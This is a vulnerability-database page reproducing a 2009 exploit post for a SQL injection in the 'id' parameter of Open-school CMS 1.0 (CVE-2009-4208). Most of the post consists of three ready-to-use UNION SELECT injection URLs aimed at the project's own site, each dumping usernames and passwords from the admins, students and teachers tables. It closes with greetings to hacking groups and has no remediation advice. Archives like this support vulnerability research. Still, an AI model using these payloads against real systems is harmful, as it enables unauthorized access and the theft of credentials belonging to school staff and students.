Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2009-4208

Publish Date: 01 Jun 2009

Author: OzX

                Cms : Open-school
Version : 1.0
Archivo : Index.php
Parametro : id
Sitio :http://open-school.org
Url Vulnz :http://site.com/index.php?module=os_news&amp;view=show&amp;id=[SQLI]

Demo Injection:

Admin (User,Pass):
http://open-school.org/index.php?module=os_news&amp;view=show&amp;id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+admins

Students (User,Pass):
http://open-school.org/index.php?module=os_news&amp;view=show&amp;id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+students

Teachers (User,Pass):
http://open-school.org/index.php?module=os_news&amp;view=show&amp;id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+teachers

Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net. 

# milw0rm.com [2009-06-01]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Open-school 1.0 - 'id' SQL Injection

Vulmon Search

About

Products

Connect